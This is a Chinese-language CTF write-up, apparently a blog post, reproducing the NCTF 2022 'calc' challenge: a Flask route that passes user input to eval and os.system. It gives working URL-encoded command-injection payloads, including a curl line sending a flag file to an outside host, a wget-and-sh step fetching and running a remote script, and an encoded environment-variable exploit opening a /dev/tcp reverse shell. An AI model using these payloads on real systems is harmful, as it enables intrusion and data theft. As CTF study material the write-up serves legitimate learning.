2022NCTF
是真的菜
开始复现把
calc
访问之后获得源码
@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"
可以看到 它定义了一个 clac路由 然后get的方式接受了一个num的参数
然后经过了 waf 最终 执行os.system (log)
这里我们可以传入 %27%27%27111%0als%09/%0a%27%27%27
返回
我们输入%27%27%27%27%27%27
的目的是 不上上面的eval 报错
在py里面 三个引号表示一个字符串 所以 在 eval(num)这里不会报错的 (不过我不知道为什么我在我本地试是会报错的)
但是在远程是可以继续往下去执行的 要不然也不会去返回结果
return 实在 eval后面的所以 意思就是题目环境是没有什么问题的
然后 漏洞的真正的利用点是 os.system(log)
看看 log是怎么来的
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S" ,time.localtime()) ,ip ,num)
我们可控的点 就是 这个 nun
然后 会执行 os.system
这个函数 就是 直接可以执行系统命令 然后 由于上面 是 echo 然后我们可以随便 在 num这里写上 换行符 url编码之后就是 %0a 这样 前面所有拼接的 就被当成第一行 系统命令去执行了 然后 经过换行之后 执行第二行的系统命令 因为这里是 echo 命令 所以后面只添加一些字符串的 话是不会报错的 可以继续往下去执行 然后 由于空格被 过滤了 我们可以使用 tab
键来代替空格 url编码是%09 然后 在 完成我们想要执行的额命令之后 后面 只需要拼接上 %0a 就可以继续换行执行下一行命令了
然后 具体执行什么命令呢
可以post发包
curl http://xxxxx:2333 -d @/Th1s_is__F1114g
%27%27%271%27%0awget%09-O%09./tmp/test5.txt%09http://xxxxxx/test11.txt%09%0a%273%27%27%27
%27%27%271%27%0Ash%09./tmp/test5.txt%0A%272%27%27%27
刚刚这个是非预期
后来github上发了源码 然后就出现了官方wp
如何修复非预期的呢 就是官方wp是通过变量覆盖 环境变量的
怎么覆盖 环境变量呢 由于过滤了 =
在python 中 可以用for 循环来覆盖变量
有因为过滤了空格 就可以用%09或者 这里利用python的特性 可以直接用[]
来绕过空格
os.environ['BASH_FUNC_echo%%']='() { id; }'
覆盖这个环境变量就可以执行命令了 id就是我们想要执行的命令了
exp
[[str][0]for[%EF%BD%8Fs.environ[%27\x0\x42\x0\x41\x0\x53\x0\x48\x0\x5f\x0\x46\x0\x55\x0\x4e\x0\x43\x0\x5f\x0\x65\x0\x63\x0\x68\x0\x6f\x0\x25\x0\x25\x0\x7\x0\x0\x0\x27\x0\x28\x0\x29\x0\x20\x0\x7b\x0\x20\x0\x62\x0\x61\x0\x73\x0\x68\x0\x20\x0\x2d\x0\x69\x0\x20\x0\x3e\x0\x26\x0\x20\x0\x2f\x0\x64\x0\x65\x0\x76\x0\x2f\x0\x74\x0\x63\x0\x70\x0\x2f\x0\x78\x78\x78\x78\x78\x2f\x0\x32\x0\x33\x0\x33\x0\x33\x0\x20\x0\x30\x0\x3e\x0\x26\x0\x31\x0\x3b\x0\x20\x0\x7d%27]]]
最新文章
- ML-线性回归
- Arrays和Collection之间的转换
- OpenJudge4980:拯救行动//stl优先队列
- JSP连接数据库
- PHP5.2至5.6的新增功能详解
- phpstorm取消自动保存,修改快捷键并标识修改的文件为星星标记
- CSS布局 -- 左侧定宽,右侧自适应
- angularjs 指令(directive)详解(1)
- LeetCode13 Roman to Integer
- JS全局变量VAR和THIS
- NOIP2004 津津的储蓄计划
- Delphi中的GetEnumName和GetEnumValue的使用方法
- 分页控件AspNetPager学习笔记
- 使用D3 Geo模块画澳大利亚地图
- bzoj 4180: 字符串计数
- EBS 新建消息并且通过fnd_message提示
- BZOJ4081 : [Wf2014]Skiing
- Python高级特性(切片,迭代,列表生成式,生成器,迭代器)
- PP学习笔记-业务基础
- confirm消息对话框